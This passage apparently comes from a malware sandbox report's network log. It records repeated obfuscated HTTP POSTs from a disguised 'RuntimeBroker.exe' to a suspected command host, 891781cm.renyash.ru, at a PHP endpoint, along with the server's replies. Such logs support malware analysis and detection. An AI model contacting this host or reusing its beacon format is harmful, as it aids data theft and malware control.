                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3743&min_rtt=1501&rtt_var=5048&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=75091&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          103192.168.2.450001104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:21.397828102 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:21.756254911 CET1056OUTData Raw: 50 52 58 52 5a 5f 51 5e 55 5a 54 59 51 5f 55 5c 58 5e 5c 5e 59 51 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PRXRZ_Q^UZTYQ_U\X^\^YQRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ?<=!(91-%X==4&4*V-$',2T$/'8. ^($W*,#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:21.842343092 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:22.107605934 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jaxl9n6h9D57ypmjeIDLlz6xBCO4ENmEz9d6zHFpNFPJ71YRbwkoySKOwBDTeCyyp1BIA2tBR6abj3ajw582U%2BPx48ZihdvA6oUkYy72pMx%2BykX8thdauRKZ6aDdLmHjUV5aTdxM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63e53b894273-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2547&min_rtt=1817&rtt_var=2142&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=190625&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          104192.168.2.450007104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:22.227159977 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:22.587194920 CET1056OUTData Raw: 55 53 58 52 5a 5c 54 5f 55 5a 54 59 51 5a 55 57 58 52 5c 55 59 57 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXRZ\T_UZTYQZUWXR\UYWRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+Y)[4;^1>"(=?$$:P94$Q'Z /.<Z?(,#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:22.679940939 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:22.950293064 CET820INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:22 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2F%2BTLfNqRMDBRXN%2FG8kw4dowCT%2B4xuovTakGUIgVgUvxGPyoBlUBR5wLQd%2BE%2FtSUU18Zr%2FXgCHgtZ6VmU3u2pEpIKO7BTXs%2B%2BBQbVUlQra6lvOFfUA1kjuId%2BHVA%2FxrgAGGup5xm"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63ea7d941889-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1499&rtt_var=723&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=681287&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          105192.168.2.450013104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:23.217397928 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:23.568631887 CET1780OUTData Raw: 55 5e 58 51 5a 5d 54 5e 55 5a 54 59 51 5a 55 53 58 5d 5c 5f 59 56 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^XQZ]T^UZTYQZUSX]\_YVR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \(?Z41^&->).3Y3$..4#'2Q$0,>4_+X8W)#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:23.688419104 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:23.948895931 CET953INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:23 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KidECIKhpF6Dzvm1TsOH4Baz80ryHkMk9ggSIXRQk2sKvf2Shc7djM4M5AvmRvmujOVLUevKgFR%2FOVYTqhOihCf62qpMVJeaVC22a5VG3u%2BJyKh%2BDzGISiZhXGoi8UhNy9iSCD05"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63f0cfc4f795-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4077&min_rtt=1456&rtt_var=5788&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=65100&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 0c 33 2b 37 5d 29 2e 29 01 2f 3c 2f 57 25 2f 2d 01 33 30 33 01 31 3d 36 06 2e 2b 2c 1e 3c 15 23 5a 31 3a 21 13 20 1f 03 01 31 26 2e 5d 04 1d 25 5d 3d 3a 35 06 2a 2f 35 5f 2a 32 24 58 27 27 38 00 26 34 20 10 24 2d 39 04 21 0c 3b 1e 30 30 2c 52 3f 07 09 5e 33 2d 22 1f 21 3a 2e 57 0d 12 22 1d 31 07 3a 0d 3e 31 34 10 36 3f 24 0f 27 3c 2b 1c 33 3c 0e 1c 37 3b 3e 1f 2a 01 2f 01 36 34 39 51 25 2a 2f 5f 21 3a 26 05 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!3+7]).)/</W%/-3031=6.+,<#Z1:! 1&.]%]=:5*/5_*2$X''8&4 $-9!;00,R?^3-"!:.W"1:>146?$'<+3<7;>*/649Q%*/_!:&6"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          106192.168.2.450014104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:23.232312918 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:23.584558964 CET1056OUTData Raw: 55 53 58 5d 5f 5a 51 5a 55 5a 54 59 51 5c 55 53 58 5f 5c 58 59 52 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USX]_ZQZUZTYQ\USX_\XYRR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^)/)!(-X2Y*3^0$.7?3?2T&/;_8>,]?=,#^!'^)
                                                                                                                          Jan 1, 2025 04:23:23.695660114 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:23.885036945 CET813INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:23 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqnO3gpGgBVNTaiTrGhYCh%2BEoZ1g4PfVuQ%2B3dS1%2FoO4oyAhWuAfJuNmhl2XQihZNh0bmdIHcE%2F9nUl96l5Akwm8bz0nI0XsFRVPfb3%2BPDi%2FA6dXTebKrcbZ%2BaLV5GyH31hS41Ovl"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63f0cc8072a5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3510&min_rtt=2049&rtt_var=3691&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=106259&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          107192.168.2.450020104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:24.006871939 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:24.367757082 CET1056OUTData Raw: 50 53 58 53 5a 5b 51 59 55 5a 54 59 51 58 55 51 58 5c 5c 58 59 5d 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PSXSZ[QYUZTYQXUQX\\XY]RZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (%!+^2=*)0$99483Y"'<0,=$\?<R(<#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:24.453244925 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:24.636549950 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXq1U6wa4TqmT0OnyMDpPQT2p%2FalZ4KVfImAfnHoZbvlt6CB4S49b2yPs3OHDcetgytrVItbYWF0HIm9%2FpyLwz3FRmNpT6by1lXea8bYC2Dp69fmqe%2Fpv8JphpFYFlzqBjW0cq2f"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63f589d47cf6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2715&min_rtt=1825&rtt_var=2466&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=163092&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          108192.168.2.450026104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:24.757076025 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:25.115583897 CET1056OUTData Raw: 55 51 5d 53 5a 5a 51 5e 55 5a 54 59 51 5c 55 57 58 52 5c 5b 59 53 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQ]SZZQ^UZTYQ\UWXR\[YSRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(%] +>&>Y>?Z$7..78$/*T&<//.<(-(V=,#^!'^)
                                                                                                                          Jan 1, 2025 04:23:25.197766066 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:25.455619097 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:25 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cinEDCv5qXqpUGjl0KCKXZEExc8ltAklFnCetnlYtzi8UiVE%2FmDIzP6f8qoNjnfF7X7BX0dLBgmbyL%2FknOlYZ1uERypFBwb9cBVRs%2FZhPOuLeXx%2FjDJPa7BCOCTl1XfPz7L2BCrX"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63fa3c9ade94-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2592&min_rtt=1458&rtt_var=2816&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=138572&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          109192.168.2.450035104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:25.953840971 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:26.303040981 CET1056OUTData Raw: 55 55 58 55 5a 5f 51 58 55 5a 54 59 51 5a 55 50 58 5d 5c 5f 59 53 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXUZ_QXUZTYQZUPX]\_YSRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(<6 >2>+'4&V.7<'Y=3?'Y,-<[?X;=#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:26.406476974 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:26.585832119 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDACc0U%2B38ZXBoQjub63f0DioRDdYNymiPzaUDh29BSSfEN%2FIVv1z2Z4BS06VSmrVgCczY%2BLTBBfNwsdNz4FIalD9iG0bBcYYICUG%2BPnrneRqdv2lWbl5efFjs5hQPbYYd7muSnb"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6401c8744408-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3913&min_rtt=1603&rtt_var=5221&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=72694&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          110192.168.2.450041104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:26.709604025 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:27.068700075 CET1056OUTData Raw: 50 53 5d 53 5a 57 51 5d 55 5a 54 59 51 52 55 53 58 5a 5c 5e 59 5d 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]SZWQ]UZTYQRUSXZ\^Y]RY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +?1] ^2).&'"P94$Y6W$/ ,>8<>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:27.163788080 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:27.341392040 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:27 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNGvej2inTSv6KyDTknlTwGW%2BLyP21d1j9FO5gVafBm0YRI35sUyhGq02OdWXjH78eDuqlGsjhDL78bJMYZgObDlVa7X0LxBLKYLjVOOgWOEEaCAmHZXI7F2jlb6%2FXwUy3kgbVcj"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64068a9e41f3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5358&min_rtt=2223&rtt_var=7105&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=53460&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          111192.168.2.450047104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:27.464421034 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:27.818742990 CET1056OUTData Raw: 50 55 58 52 5f 5a 51 59 55 5a 54 59 51 58 55 5c 58 52 5c 5a 59 57 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PUXR_ZQYUZTYQXU\XR\ZYWRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y?)Z4=^&X5]=>34%-B83U&?8->;<>=<#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:27.927350998 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:28.206357956 CET799INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:28 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
